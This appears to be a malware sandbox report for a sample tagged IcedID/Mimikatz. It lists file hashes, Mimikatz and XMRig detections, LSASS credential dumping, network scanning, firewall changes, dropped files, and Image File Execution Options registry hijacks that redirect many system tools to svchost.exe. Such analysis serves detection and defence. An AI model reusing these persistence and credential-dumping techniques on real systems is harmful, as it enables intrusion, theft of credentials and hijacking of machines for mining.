Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
09/01/2025, 07:08
250109-hyg9ssvndl 1009/01/2025, 06:26
250109-g7l4ns1qew 1008/01/2025, 07:49
250108-jn6p3ssrak 10Analysis
-
max time kernel
270s -
max time network
271s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09/01/2025, 06:26
Behavioral task
behavioral1
Sample
2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
67185fa9999bd87584927cab134afe81
-
SHA1
822702b6113ae7862351b0af1bf0322ef005b6cc
-
SHA256
a0b78c1b935ebc21f28f450a7cdf349f34c4e918dc9badf91c9980918c657edc
-
SHA512
a8472dd8c19cae2cf0225d51e0e8666d732208a29dc84f4a05201dba737d8e8aa07fb75003a6507e6c1923d6f420af5e77b8e2d75a2d81936a29fabffc18fea3
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1668 created 1808 1668 jirnzjt.exe 37 -
Xmrig family
-
Contacts a large (90830) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 19 IoCs
resource yara_rule behavioral1/memory/1236-178-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-184-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-202-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-215-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-223-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-235-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-250-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-500-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-502-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-541-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-796-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-797-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-798-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-801-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-804-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-812-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-823-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-1347-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig behavioral1/memory/1236-1358-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral1/memory/1856-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/1856-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/files/0x000a000000023b75-6.dat mimikatz behavioral1/memory/2916-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/4516-138-0x00007FF6D6270000-0x00007FF6D635E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts jirnzjt.exe File opened for modification C:\Windows\system32\drivers\etc\hosts jirnzjt.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe jirnzjt.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 920 netsh.exe 4332 netsh.exe -
Executes dropped EXE 47 IoCs
pid Process 2916 jirnzjt.exe 1668 jirnzjt.exe 3060 wpcap.exe 3880 llefvytvt.exe 4516 vfshost.exe 748 vrlgkrtsk.exe 4152 xohudmc.exe 1116 skwigk.exe 1236 jngiyk.exe 1320 vrlgkrtsk.exe 4776 vrlgkrtsk.exe 1900 vrlgkrtsk.exe 3176 vrlgkrtsk.exe 4908 vrlgkrtsk.exe 4744 vrlgkrtsk.exe 1496 jirnzjt.exe 2172 vrlgkrtsk.exe 4076 vrlgkrtsk.exe 3920 vrlgkrtsk.exe 3164 vrlgkrtsk.exe 4372 vrlgkrtsk.exe 4984 vrlgkrtsk.exe 4776 vrlgkrtsk.exe 2636 vrlgkrtsk.exe 4916 vrlgkrtsk.exe 4172 vrlgkrtsk.exe 1248 lsivtqwuf.exe 1104 jirnzjt.exe 3556 jirnzjt.exe 5680 vrlgkrtsk.exe 5920 vrlgkrtsk.exe 1524 vrlgkrtsk.exe 6036 vrlgkrtsk.exe 964 vrlgkrtsk.exe 976 vrlgkrtsk.exe 920 vrlgkrtsk.exe 5844 vrlgkrtsk.exe 2456 vrlgkrtsk.exe 4864 vrlgkrtsk.exe 3964 vrlgkrtsk.exe 5176 vrlgkrtsk.exe 2596 vrlgkrtsk.exe 1872 lsivtqwuf.exe 5520 vrlgkrtsk.exe 5348 jirnzjt.exe 5676 vrlgkrtsk.exe 3196 vrlgkrtsk.exe -
Loads dropped DLL 12 IoCs
pid Process 3060 wpcap.exe 3060 wpcap.exe 3060 wpcap.exe 3060 wpcap.exe 3060 wpcap.exe 3060 wpcap.exe 3060 wpcap.exe 3060 wpcap.exe 3060 wpcap.exe 3880 llefvytvt.exe 3880 llefvytvt.exe 3880 llefvytvt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 73 ifconfig.me 72 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\skwigk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F jirnzjt.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 jirnzjt.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\skwigk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 jirnzjt.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft jirnzjt.exe -
resource yara_rule behavioral1/files/0x0007000000023c68-135.dat upx behavioral1/memory/4516-136-0x00007FF6D6270000-0x00007FF6D635E000-memory.dmp upx behavioral1/memory/4516-138-0x00007FF6D6270000-0x00007FF6D635E000-memory.dmp upx behavioral1/memory/748-142-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/files/0x0007000000023c73-141.dat upx behavioral1/memory/748-150-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/files/0x0007000000023c70-164.dat upx behavioral1/memory/1236-165-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1320-172-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/4776-176-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/1236-178-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1900-182-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/1236-184-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/3176-187-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/4908-191-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/4744-195-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/1236-202-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/2172-204-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/4076-208-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/3920-212-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/1236-215-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/3164-217-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/4372-221-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/1236-223-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/4984-226-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/4776-230-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/2636-234-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/1236-235-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/4916-237-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/4172-239-0x00007FF68AD50000-0x00007FF68ADAB000-memory.dmp upx behavioral1/memory/1236-250-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1236-500-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1236-502-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1236-541-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1236-796-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1236-797-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1236-798-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1236-801-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/1236-804-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/5680-808-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/5680-810-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/1236-812-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/5920-815-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/1524-819-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/6036-822-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/1236-823-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/964-1334-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/976-1337-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/920-1343-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/5844-1346-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/1236-1347-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/2456-1351-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/4864-1354-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/3964-1357-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/1236-1358-0x00007FF6F1AB0000-0x00007FF6F1BD0000-memory.dmp upx behavioral1/memory/5176-1362-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/2596-1611-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/5520-1618-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/5676-1623-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx behavioral1/memory/3196-1627-0x00007FF60AEB0000-0x00007FF60AF0B000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\etqajulug\ekithtuut\wpcap.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\spoolsrv.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\svschost.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\docmicfg.xml jirnzjt.exe File created C:\Windows\mgifenbt\spoolsrv.xml jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\llefvytvt.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\trfo-2.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\xdvl-0.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\vimpcsvc.xml jirnzjt.exe File created C:\Windows\mgifenbt\schoedcl.xml jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\Packet.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\ucl.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\docmicfg.xml jirnzjt.exe File created C:\Windows\mgifenbt\svschost.xml jirnzjt.exe File opened for modification C:\Windows\mgifenbt\spoolsrv.xml jirnzjt.exe File created C:\Windows\etqajulug\Corporate\vfshost.exe jirnzjt.exe File opened for modification C:\Windows\mgifenbt\jirnzjt.exe 2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe File created C:\Windows\etqajulug\UnattendGC\specials\exma-1.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\vimpcsvc.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\AppCapture64.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\AppCapture32.dll jirnzjt.exe File created C:\Windows\etqajulug\upbdrjv\swrpwe.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\ssleay32.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\trch-1.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\libxml2.dll jirnzjt.exe File created C:\Windows\mgifenbt\vimpcsvc.xml jirnzjt.exe File opened for modification C:\Windows\etqajulug\Corporate\log.txt cmd.exe File opened for modification C:\Windows\etqajulug\ekithtuut\Packet.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\spoolsrv.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\schoedcl.exe jirnzjt.exe File created C:\Windows\mgifenbt\docmicfg.xml jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\scan.bat jirnzjt.exe File created C:\Windows\mgifenbt\jirnzjt.exe 2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\mgifenbt\docmicfg.xml jirnzjt.exe File opened for modification C:\Windows\mgifenbt\schoedcl.xml jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\ip.txt jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\coli-0.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\crli-0.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\tibe-2.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\tucl-1.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\schoedcl.xml jirnzjt.exe File created C:\Windows\ime\jirnzjt.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\docmicfg.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\Shellcode.ini jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\wpcap.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\posh-0.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\spoolsrv.xml jirnzjt.exe File created C:\Windows\etqajulug\Corporate\mimidrv.sys jirnzjt.exe File created C:\Windows\etqajulug\Corporate\mimilib.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\svschost.xml jirnzjt.exe File opened for modification C:\Windows\mgifenbt\svschost.xml jirnzjt.exe File opened for modification C:\Windows\mgifenbt\vimpcsvc.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\libeay32.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\svschost.exe jirnzjt.exe File opened for modification C:\Windows\etqajulug\ekithtuut\Result.txt lsivtqwuf.exe File created C:\Windows\etqajulug\ekithtuut\lsivtqwuf.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\cnli-1.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\zlib1.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\vimpcsvc.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\schoedcl.xml jirnzjt.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2736 sc.exe 4316 sc.exe 4740 sc.exe 5100 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated 